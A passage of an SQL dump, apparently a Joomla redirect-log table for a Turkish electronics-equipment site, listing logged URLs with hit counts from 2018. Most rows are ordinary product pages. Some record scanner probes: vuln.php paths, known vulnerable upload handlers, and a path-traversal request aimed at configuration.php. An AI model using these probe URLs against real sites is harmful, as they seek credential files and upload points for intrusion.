00:00:00',301),(19698,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturers/mirae',NULL,'','',5,0,'2018-04-25 11:54:27','0000-00-00 00:00:00',301),(19699,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturers/panasonic',NULL,'','',4,0,'2018-04-25 11:54:33','0000-00-00 00:00:00',301),(19700,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/stencil-washer-eco-detail?tmpl=component&print=1',NULL,'','',2,0,'2018-04-25 11:54:39','0000-00-00 00:00:00',301),(19701,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturers/mirae',NULL,'','',13,0,'2018-04-25 11:56:01','0000-00-00 00:00:00',301),(19702,'http://www.3s-technologies.com.tr/tr/admin/images/cal_date_over.gif',NULL,'','',18,0,'2018-04-25 18:43:39','0000-00-00 00:00:00',301),(19703,'http://www.3s-technologies.com.tr/tr/admin/login.php',NULL,'','',20,0,'2018-04-25 18:43:42','0000-00-00 00:00:00',301),(19704,'http://www.3s-technologies.com.tr/tr/images/vuln2.php',NULL,'','',13,0,'2018-04-25 18:45:13','0000-00-00 00:00:00',301),(19705,'http://www.3s-technologies.com.tr/tr/tmp/vuln2.php',NULL,'','',13,0,'2018-04-25 18:45:29','0000-00-00 00:00:00',301),(19706,'http://www.3s-technologies.com.tr/tr/images/vuln.php',NULL,'','',27,0,'2018-04-25 18:45:44','0000-00-00 00:00:00',301),(19707,'http://www.3s-technologies.com.tr/tr/tmp/vuln.php',NULL,'','',27,0,'2018-04-25 18:45:48','0000-00-00 00:00:00',301),(19708,'http://www.3s-technologies.com.tr/tr/administrator/components/com_alberghi/upload.alberghi.php',NULL,'','',10,0,'2018-04-25 18:46:08','0000-00-00 00:00:00',301),(19709,'http://www.3s-technologies.com.tr/tr/?option=com_cckjseblod&task=download&file=configuration.php',NULL,'','',6,0,'2018-04-25 18:46:10','0000-00-00 00:00:00',301),(19710,'http://www.3s-technologies.com.tr/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=',NULL,'','',11,0,'2018-04-25 18:46:14','0000-00-00 00:00:00',301),(19711,'http://www.3s-technologies.com.tr/tr/media/vuln.txt',NULL,'','',10,0,'2018-04-25 18:46:17','0000-00-00 00:00:00',301),(19712,'http://www.3s-technologies.com.tr/tr/images/pwn.gif',NULL,'','',6,0,'2018-04-25 18:47:20','0000-00-00 00:00:00',301),(19713,'http://www.3s-technologies.com.tr/tr/plugins/content/s5_media_player/helper.php?fileurl=li4vli4vli4vy29uzmlndxjhdglvbi5waha=',NULL,'','',28,0,'2018-04-25 18:48:06','0000-00-00 00:00:00',301),(19714,'http://www.3s-technologies.com.tr/tr/fckeditor/editor/filemanager/connectors/php/upload.php?type=media',NULL,'','',12,0,'2018-04-25 18:48:11','0000-00-00 00:00:00',301),(19715,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/screen-printer/by,ordering',NULL,'','',7,0,'2018-04-26 05:49:59','0000-00-00 00:00:00',301),(19716,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/screen-printer/results,1-50',NULL,'','',1,0,'2018-04-26 08:07:54','0000-00-00 00:00:00',301),(19717,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/manufacturer/mirae',NULL,'','',27,0,'2018-04-26 13:55:25','0000-00-00 00:00:00',301),(19718,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,ordering/results,1-5',NULL,'','',1,0,'2018-04-26 17:43:55','0000-00-00 00:00:00',301),(19719,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/results,1-5?language=en-gb',NULL,'','',1,0,'2018-04-26 19:21:13','0000-00-00 00:00:00',301),(19720,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,product_sku/results,1-10?language=en-gb',NULL,'','',1,0,'2018-04-26 21:08:14','0000-00-00 00:00:00',301),(19721,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,product_sku/results,1-20?language=en-gb',NULL,'','',1,0,'2018-04-26 23:24:27','0000-00-00 00:00:00',301),(19722,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,product_sku/results,1-50?language=en-gb',NULL,'','',10,0,'2018-04-27 01:11:28','0000-00-00 00:00:00',301),(19723,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,`p`.product_sku/results,1-5?language=en-gb',NULL,'','',1,0,'2018-04-27 02:09:00','0000-00-00 00:00:00',301),(19724,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/ddm-novastar/dalga-lehim/by,product_name/results,1-50?language=en-gb',NULL,'','',1,0,'2018-04-27 03:11:04','0000-00-00 00:00:00',301),(19725,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,ordering',NULL,'','',1,0,'2018-04-27 06:29:41','0000-00-00 00:00:00',301),(19726,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,ordering/results,1-5',NULL,'','',1,0,'2018-04-27 08:21:24','0000-00-00 00:00:00',301),(19727,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,ordering/results,1-20',NULL,'','',1,0,'2018-04-27 09:42:05','0000-00-00 00:00:00',301),(19728,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,ordering/results,1-10',NULL,'','',1,0,'2018-04-27 11:33:48','0000-00-00 00:00:00',301),(19729,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,ordering/results,1-50',NULL,'','',1,0,'2018-04-27 13:13:10','0000-00-00 00:00:00',301),(19730,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,product_sku/results,1-5',NULL,'','',1,0,'2018-04-28 01:09:46','0000-00-00 00:00:00',301),(19731,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,ordering/results,1-20',NULL,'','',1,0,'2018-04-30 07:35:48','0000-00-00 00:00:00',301),(19732,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,product_sku/results,1-50',NULL,'','',1,0,'2018-04-30 09:18:39','0000-00-00 00:00:00',301),(19733,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,product_sku/results,1-10',NULL,'','',1,0,'2018-04-30 11:01:30','0000-00-00 00:00:00',301),(19734,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,`p`.product_sku/results,1-5',NULL,'','',4,0,'2018-04-30 12:54:38','0000-00-00 00:00:00',301),(19735,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,pc.ordering,product_name/dirdesc/results,1-5',NULL,'','',1,0,'2018-04-30 14:27:12','0000-00-00 00:00:00',301),(19736,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,`p`.product_sku/results,1-10',NULL,'','',1,0,'2018-04-30 14:37:29','0000-00-00 00:00:00',301),(19737,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,mf_name/results,1-20',NULL,'','',1,0,'2018-04-30 14:47:46','0000-00-00 00:00:00',301),(19738,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,pc.ordering,product_name/results,1-5',NULL,'','',1,0,'2018-04-30 15:39:12','0000-00-00 00:00:00',301),(19739,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,mf_name/results,1-50',NULL,'','',1,0,'2018-04-30 16:51:11','0000-00-00 00:00:00',301),(19740,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,pc.ordering,product_name/results,1-50',NULL,'','',1,0,'2018-04-30 17:22:03','0000-00-00 00:00:00',301),(19741,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku/results,1-10',NULL,'','',1,0,'2018-05-01 11:58:16','0000-00-00 00:00:00',301),(19742,'http://www.3s-technologies.com.tr//administrator/components/com_xcloner-backupandrestore/index2.php',NULL,'','',1,0,'2018-05-01 14:42:42','0000-00-00 00:00:00',301),(19743,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,mf_name/results,1-5',NULL,'','',1,0,'2018-05-01 17:32:40','0000-00-00 00:00:00',301),(19744,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,product_sku/results,1-20',NULL,'','',3,0,'2018-05-02 03:54:10','0000-00-00 00:00:00',301),(19745,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,product_name/dirdesc/results,1-10',NULL,'','',1,0,'2018-05-02 05:16:05','0000-00-00 00:00:00',301),(19746,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_name/dirdesc/results,1-50?language=en-gb&filter_product=',NULL,'','',1,0,'2018-05-02 07:01:26','0000-00-00 00:00:00',301),(19747,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,product_name/results,1-10?language=en-gb',NULL,'','',2,0,'2018-05-02 11:23:55','0000-00-00 00:00:00',301),(19748,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,`p`.product_sku/results,1-20',NULL,'','',1,0,'2018-05-02 11:53:39','0000-00-00 00:00:00',301),(19749,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,mf_name/results,1-10',NULL,'','',4,0,'2018-05-02 12:35:15','0000-00-00 00:00:00',301),(19750,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,ordering/results,1-20',NULL,'','',9,0,'2018-05-02 14:47:04','0000-00-00 00:00:00',301),(19751,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,product_sku/results,1-5',NULL,'','',1,0,'2018-05-02 15:12:27','0000-00-00 00:00:00',301),(19752,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,product_sku/results,1-20',NULL,'','',1,0,'2018-05-02 15:27:53','0000-00-00 00:00:00',301),(19753,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,product_sku/results,1-10',NULL,'','',1,0,'2018-05-02 15:43:17','0000-00-00 00:00:00',301),(19754,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,pc.ordering,product_name/results,1-20',NULL,'','',1,0,'2018-05-02 15:48:24','0000-00-00 00:00:00',301),(19755,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,product_name/results,1-50',NULL,'','',1,0,'2018-05-02 16:59:38','0000-00-00 00:00:00',301),(19756,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,product_name/results,1-50',NULL,'','',3,0,'2018-05-02 17:09:40','0000-00-00 00:00:00',301),(19757,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,pc.ordering,product_name/results,1-10',NULL,'','',7,0,'2018-05-02 18:20:24','0000-00-00 00:00:00',301),(19758,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku/results,1-5',NULL,'','',1,0,'2018-05-02 18:35:44','0000-00-00 00:00:00',301),(19759,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku/results,1-10',NULL,'','',5,0,'2018-05-02 18:51:03','0000-00-00 00:00:00',301),(19760,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,ordering/results,1-50',NULL,'','',2,0,'2018-05-02 19:21:33','0000-00-00 00:00:00',301),(19761,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,pc.ordering,product_name/results,1-20',NULL,'','',3,0,'2018-05-02 19:31:33','0000-00-00 00:00:00',301),(19762,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/krem-lehim-31-32-33-detail',NULL,'','',26,0,'2018-05-02 22:21:36','0000-00-00 00:00:00',301),(19763,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/screen-printer/by,mf_name/dirdesc',NULL,'','',1,0,'2018-05-03 06:34:44','0000-00-00 00:00:00',301),(19764,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/screen-printer/dirdesc/results,1-10',NULL,'','',4,0,'2018-05-03 07:00:08','0000-00-00 00:00:00',301),(19765,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/screen-printer/dirdesc/results,1-50',NULL,'','',1,0,'2018-05-03 07:30:52','0000-00-00 00:00:00',301),(19766,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/screen-printer/by,product_name/results,1-5',NULL,'','',1,0,'2018-05-03 08:06:29','0000-00-00 00:00:00',301),(19767,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/screen-printer/by,`p`.product_sku/dirdesc',NULL,'','',4,0,'2018-05-03 08:26:47','0000-00-00 00:00:00',301),(19768,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/screen-printer/by,`p`.product_sku/results,1-5',NULL,'','',1,0,'2018-05-03 09:36:17','0000-00-00 00:00:00',301),(19769,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/screen-printer/by,product_name/dirdesc/results,1-20',NULL,'','',1,0,'2018-05-03 10:34:54','0000-00-00 00:00:00',301),(19770,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/screen-printer/by,category_name/dirdesc/results,1-20',NULL,'','',1,0,'2018-05-03 10:46:21','0000-00-00 00:00:00',301),(19771,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,ordering',NULL,'','',1,0,'2018-05-03 18:40:27','0000-00-00 00:00:00',301),(19772,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/results,1-20',NULL,'','',7,0,'2018-05-03 20:54:24','0000-00-00 00:00:00',301),(19773,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/screen-printer/by,pc.ordering,product_name/results,1-20?language=en-gb',NULL,'','',1,0,'2018-05-03 21:09:31','0000-00-00 00:00:00',301),(19774,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/results,1-10',NULL,'','',1,0,'2018-05-03 22:18:07','0000-00-00 00:00:00',301),(19775,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/245-k100-28-29-detail',NULL,'','',1,0,'2018-05-04 09:24:42','0000-00-00 00:00:00',301),(19776,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,mf_name/results,6-10',NULL,'','',21,0,'2018-05-04 14:20:53','0000-00-00 00:00:00',301),(19777,'http://3s-technologies.com.tr/en/products/2.-el-makineler/results,6-10',NULL,'','',15,0,'2018-05-05 00:40:33','0000-00-00 00:00:00',301),(19778,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/results,1-5',NULL,'','',1,0,'2018-05-05 01:44:05','0000-00-00 00:00:00',301),(19779,'http://3s-technologies.com.tr/tr/wp-content/plugins/reflex-gallery/admin/scripts/fileuploader/php.php',NULL,'http://3s-technologies.com.tr/tr/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php','',5,0,'2018-05-05 14:12:46','0000-00-00 00:00:00',301),(19780,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,pc.ordering,product_name/results,6-55',NULL,'','',6,0,'2018-05-05 16:18:37','0000-00-00 00:00:00',301),(19781,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/screen-printer/by,product_name/results,1-20',NULL,'','',1,0,'2018-05-05 23:36:36','0000-00-00 00:00:00',301),(19782,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_name/results,1-40',NULL,'','',1,0,'2018-05-06 00:01:57','0000-00-00 00:00:00',301),(19783,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,product_name/results,1-20',NULL,'','',2,0,'2018-05-06 07:31:23','0000-00-00 00:00:00',301),(19784,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,mf_name/dirdesc/results,1-20?language=en-gb',NULL,'','',1,0,'2018-05-06 17:36:19','0000-00-00 00:00:00',301),(19785,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/by,ordering',NULL,'','',1,0,'2018-05-07 04:20:58','0000-00-00 00:00:00',301),(19786,'http://3s-technologies.com.tr/tr/plugins/jquery-file-upload/server/php/',NULL,'http://3s-technologies.com.tr/tr/plugins/jquery-file-upload/server/php/','',2,0,'2018-05-07 05:53:35','0000-00-00 00:00:00',301),(19787,'http://3s-technologies.com.tr/en/plugins/jquery-file-upload/server/php',NULL,'http://3s-technologies.com.tr/plugins/jquery-file-upload/server/php/','',1,0,'2018-05-07 10:08:20','0000-00-00 00:00:00',301),(19788,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/results,1-5',NULL,'','',5,0,'2018-05-07 11:03:18','0000-00-00 00:00:00',301),(19789,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/results,1-50',NULL,'','',5,0,'2018-05-07 17:45:58','0000-00-00 00:00:00',301),(19790,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/results,1-10',NULL,'','',5,0,'2018-05-07 19:17:07','0000-00-00 00:00:00',301),(19791,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/results,1-20',NULL,'','',1,0,'2018-05-07 21:50:33','0000-00-00 00:00:00',301),(19792,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/by,mf_name/dirdesc',NULL,'','',5,0,'2018-05-08 16:03:28','0000-00-00 00:00:00',301),(19793,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/dirdesc/results,1-10',NULL,'','',1,0,'2018-05-08 16:48:58','0000-00-00 00:00:00',301),(19794,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/by,product_name/dirdesc',NULL,'','',2,0,'2018-05-08 17:14:49','0000-00-00 00:00:00',301),(19795,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/by,mf_name/results,1-50',NULL,'','',1,0,'2018-05-08 17:30:15','0000-00-00 00:00:00',301),(19796,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/by,ordering/results,1-5',NULL,'','',17,0,'2018-05-08 18:15:58','0000-00-00 00:00:00',301),(19797,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/by,ordering/results,1-10',NULL,'','',3,0,'2018-05-08 20:55:56','0000-00-00 00:00:00',301),(19798,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/by,ordering/results,1-50',NULL,'','',1,0,'2018-05-09 02:55:53','0000-00-00 00:00:00',301),(19799,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-fırın/by,pc.ordering,product_name/results,1-5',NULL,'','',1,0,'2018-05-09 11:25:22','0000-00-00 00:00:00',301),(19800,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/by,product_sku/results,1-5',NULL,'','',5,0,'2018-05-09 12:34:41','0000-00-00 00:00:00',301),(19801,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/by,product_sku/results,1-10',NULL,'','',4,0,'2018-05-09 14:06:36','0000-00-00 00:00:00',301),(19802,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/by,product_sku/results,1-20',NULL,'','',6,0,'2018-05-09 15:46:10','0000-00-00 00:00:00',301),(19803,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/by,category_name/results,1-5',NULL,'','',5,0,'2018-05-09 17:28:38','0000-00-00 00:00:00',301),(19804,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/dirdesc/results,1-20',NULL,'','',5,0,'2018-05-09 19:31:11','0000-00-00 00:00:00',301),(19805,'http://www.3s-technologies.com.tr/en/products/manufacturer/screen-printer/by,`p`.product_sku/dirdesc',NULL,'','',1,0,'2018-05-09 20:03:26','0000-00-00 00:00:00',301),(19806,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/by,product_name/results,1-50',NULL,'','',7,0,'2018-05-09 23:05:39','0000-00-00 00:00:00',301),(19807,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/by,category_name/results,1-10',NULL,'','',4,0,'2018-05-10 00:37:33','0000-00-00 00:00:00',301),(19808,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,category_name',NULL,'','',3,0,'2018-05-10 00:45:12','0000-00-00 00:00:00',301),(19809,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,`p`.product_sku',NULL,'','',5,0,'2018-05-10 02:09:28','0000-00-00 00:00:00',301),(19810,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/by,category_name/results,1-50',NULL,'','',3,0,'2018-05-10 02:47:45','0000-00-00 00:00:00',301),(19811,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,pc.ordering,product_name',NULL,'','',6,0,'2018-05-10 03:41:22','0000-00-00 00:00:00',301),(19812,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/by,`p`.product_sku/dirdesc',NULL,'','',4,0,'2018-05-10 04:04:21','0000-00-00 00:00:00',301),(19813,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/by,`p`.product_sku/results,1-5',NULL,'','',2,0,'2018-05-10 04:57:58','0000-00-00 00:00:00',301),(19814,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,product_name/dirdesc',NULL,'','',3,0,'2018-05-10 05:05:37','0000-00-00 00:00:00',301),(19815,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,ordering/results,1-5',NULL,'','',1,0,'2018-05-10 06:06:53','0000-00-00 00:00:00',301),(19816,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/by,`p`.product_sku/results,1-10',NULL,'','',4,0,'2018-05-10 07:08:10','0000-00-00 00:00:00',301),(19817,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,category_name/dirdesc',NULL,'','',4,0,'2018-05-10 07:31:09','0000-00-00 00:00:00',301),(19818,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/by,`p`.product_sku/results,1-50',NULL,'','',4,0,'2018-05-10 08:47:44','0000-00-00 00:00:00',301),(19819,'http://3s-technologies.com.tr/en/administrator/components/com_simpleswfupload/uploadhandler.php',NULL,'http://3s-technologies.com.tr/administrator/components/com_simpleswfupload/uploadhandler.php','',6,0,'2018-05-10 10:29:54','0000-00-00 00:00:00',301),(19820,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/by,category_name/dirdesc/results,1-5',NULL,'','',2,0,'2018-05-10 11:05:36','0000-00-00 00:00:00',301),(19821,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/flux/by,mf_name/dirdesc',NULL,'','',1,0,'2018-05-10 13:57:25','0000-00-00 00:00:00',301),(19822,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/by,`p`.product_sku/dirdesc/results,1-5',NULL,'','',7,0,'2018-05-10 16:32:52','0000-00-00 00:00:00',301),(19823,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/dirdesc',NULL,'','',4,0,'2018-05-10 21:02:51','0000-00-00 00:00:00',301),(19824,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,ordering',NULL,'','',9,0,'2018-05-11 03:56:12','0000-00-00 00:00:00',301),(19825,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,product_name/results,1-5',NULL,'','',6,0,'2018-05-11 10:11:07','0000-00-00 00:00:00',301),(19826,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,product_sku/results,1-50',NULL,'','',1,0,'2018-05-11 14:16:14','0000-00-00 00:00:00',301),(19827,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,product_name/results,1-20',NULL,'','',5,0,'2018-05-11 15:47:42','0000-00-00 00:00:00',301),(19828,'http://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/by,mf_name/results,1-50',NULL,'','',1,0,'2018-05-11 17:05:08','0000-00-00 00:00:00',301),(19829,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,ordering/results,1-50',NULL,'','',9,0,'2018-05-11 18:40:41','0000-00-00 00:00:00',301),(19830,'http://www.3s-technologies.com.tr/tr/urunler/manufacturer/panasonic/screen-printer/dirdesc/results,1-50',NULL,'','',2,0,'2018-05-11 18:55:41','0000-00-00 00:00:00',301),(19831,'http://3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=57&itemid=145&lang=en',NULL,'','',1,0,'2018-05-11 20:32:27','0000-00-00 00:00:00',301),(19832,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,product_name',NULL,'','',5,0,'2018-05-12 03:55:56','0000-00-00 00:00:00',301),(19833,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,ordering/results,1-10',NULL,'','',1,0,'2018-05-12 05:26:16','0000-00-00 00:00:00',301),(19834,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,category_name/results,1-5',NULL,'','',4,0,'2018-05-12 07:06:43','0000-00-00 00:00:00',301),(19835,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,ordering/results,1-20',NULL,'','',6,0,'2018-05-12 07:26:10','0000-00-00 00:00:00',301),(19836,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,pc.ordering,product_name',NULL,'','',6,0,'2018-05-12 07:35:54','0000-00-00 00:00:00',301),(19837,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,mf_name/dirdesc',NULL,'','',1,0,'2018-05-12 09:13:14','0000-00-00 00:00:00',301),(19838,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,product_sku/results,1-5',NULL,'','',3,0,'2018-05-12 09:42:23','0000-00-00 00:00:00',301),(19839,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,mf_name/results,1-5',NULL,'','',1,0,'2018-05-12 10:40:45','0000-00-00 00:00:00',301),(19840,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,product_sku/results,1-20',NULL,'','',5,0,'2018-05-12 12:08:19','0000-00-00 00:00:00',301),(19841,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,mf_name/results,1-10',NULL,'','',4,0,'2018-05-12 12:18:03','0000-00-00 00:00:00',301),(19842,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,product_name/results,1-5',NULL,'','',3,0,'2018-05-12 12:56:58','0000-00-00 00:00:00',301),(19843,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,ordering/results,1-5',NULL,'','',4,0,'2018-05-12 13:35:53','0000-00-00 00:00:00',301),(19844,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,mf_name/results,1-20',NULL,'','',11,0,'2018-05-12 14:05:04','0000-00-00 